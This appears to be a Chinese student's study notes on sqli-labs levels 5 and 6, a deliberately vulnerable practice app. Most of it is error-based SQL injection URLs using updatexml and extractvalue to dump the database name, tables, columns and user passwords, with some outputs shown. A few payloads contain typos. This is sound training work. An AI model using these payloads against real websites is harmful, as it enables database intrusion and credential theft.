找到闭合,然后安装信息提示一点点尝试,除了updatexml其他的尝试方式依旧能得到想要的结果,今天有些懒了本来打算做到15题接过刷了一晚上手机其实也就刷了1题,56的思路是一样的只是闭合不一样。
192.168.253.135/sqli/Less-5/?id=0' order by 3 --+
192.168.253.135/sqli/Less-5/?id=0' union slect 1,2,3 --+
192.168.253.135/sqli/Less-5/?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
//得到XPATH syntax error: '~security~'
192.168.253.135/sqli/Less-5/?id=1'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+
//得到XPATH syntax error: '~emails~',修改limit 0,1 依次遍历得到emails uagents users
192.168.253.135/sqli/Less-5/?id=1'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' limit 0,1),0x7e),1)--+
//id email_id id referer ===
192.168.253.135/sqli/Less-5/?id=1'and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+
//
192.168.253.135/sqli/Less-5/?id=0' and extractvalue(0,concat(0x7e,version()))--+
//XPATH syntax error: '~5.5.53'
updatexml(1,concat(0x7e,(select database(),0x7e)1))
第六关
和第五关差不多只是闭合 " 多尝试几次就发现了
192.168.253.135/sqli/Less-6/?id=1
192.168.253.135/sqli/Less-6/?id=1'
192.168.253.135/sqli/Less-6/?id=1')
192.168.253.135/sqli/Less-6/?id=1"order by 3 --+
192.168.253.135/sqli/Less-6/?id=1"and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+